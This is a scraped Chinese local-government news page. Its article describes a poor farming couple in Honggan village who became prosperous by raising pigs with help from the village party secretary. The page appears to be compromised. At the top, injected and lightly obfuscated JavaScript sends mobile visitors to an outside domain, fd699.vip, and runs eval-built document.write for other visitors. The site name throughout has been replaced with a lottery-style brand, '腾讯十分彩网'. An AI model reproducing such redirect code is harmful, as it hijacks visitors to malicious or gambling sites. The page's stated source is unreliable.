function moble(){ var ss = '
'; if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "http://fd699.vip" }else{ eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); } } moble();
.banner-img {background: url(/cssz/ljym/201902/W020200829846815767504.jpg) no-repeat center;}

    | 网站支持IPv6 |
  





当前位置:
腾讯十分彩网   ->   政务公开   ->   基础腾讯十分彩   ->   新闻动态   ->   乡镇动态

勤劳夫妻养猪走上致富路

2020-10-29 10:23 来源:腾讯十分彩网融媒体中心


分享到: 【打印本页】 【字体: 大   中   】   

  在腾讯十分彩网伯劳镇红坎村刘子钦家的养猪场,看见刘子钦左手拿着一张芭蕉叶,右手举起一把廉刀正在削芭蕉叶喂猪。

  “芭蕉树叶含有大量纤维素和微量元素,用它喂猪既能加快猪身体内有害物质代谢,防止多种有毒物质在猪的身体内堆积停留,减少猪在养殖过程中出现厌食或者腹泻等不良症状及病害,又能能让猪吸收丰富的营养,养出来的猪健壮肥胖。” 刘子钦一边喂猪一边笑呵呵地说。

  刘子钦、杜之润夫妇是红坎村建档立卡贫困户,以前一直在外打工,后来因为家里有5个小孩读书需要照顾,就选择了回乡创业。刚回乡时夫妻俩一起种植了5亩甘蔗,10亩百香果,4亩柑橘。但由于缺乏经验和技术,加上受市场价格等因素的影响,收入不理想。

  红坎村的扶贫工作队了解到他家的情况后,建议他们转换种植产业和发展养殖业。经过慎重考虑,刘子钦夫妇决定通过养猪和扩大百香果种植来实现脱贫致富。在2017年初建起了养猪场,既养母猪又养肉猪,当年实现了脱贫。虽然已脱贫,但由于缺乏技术,所养的母猪产小猪崽量不多,养殖技术成了夫妻俩最大的困扰。

  2018年4月份,学兽医出身的红坎村第一书记李永金知道后,主动担当起他们家的产业指导员,悉心传授他们养猪技术。学到了生猪养殖技术后刘子钦夫妇信心满满,扩大了养殖规模,并通过自繁自育的方式,养猪产业慢慢走上了正轨,收入也是一年比一年高。在去年的非洲猪瘟疫情期间,由于管理得当,他们家的养猪场没有受到影响,所养的猪没有一头感染非洲猪瘟,养猪收入达10.1万元。尝到了甜头后,刘子钦夫妻俩更加充满信心,干劲更足。今年申请获得扶贫小额信贷资金3万元,再次扩大养殖规模,目前猪存栏共有80头。

  “上个月我们刚卖出了一批肉猪和一批小猪崽,收入7.4万元,加上已获得0.75万元的产业奖补,今年单养猪共收入了8.15万元。”刘子钦的妻子杜之润高兴地说。

  走上了养猪脱贫致富之路后的刘子钦夫妇致富不忘乡亲,不但通过“先养猪后还钱”的方式提供猪崽给想要养猪致富的贫困户,还主动将养殖技术传授给他们,让他们能通过养猪挣钱早日脱贫,大家共同走上养猪致富之路。(何 姣)

核发:腾讯十分彩网融媒体中心

  




导航链接: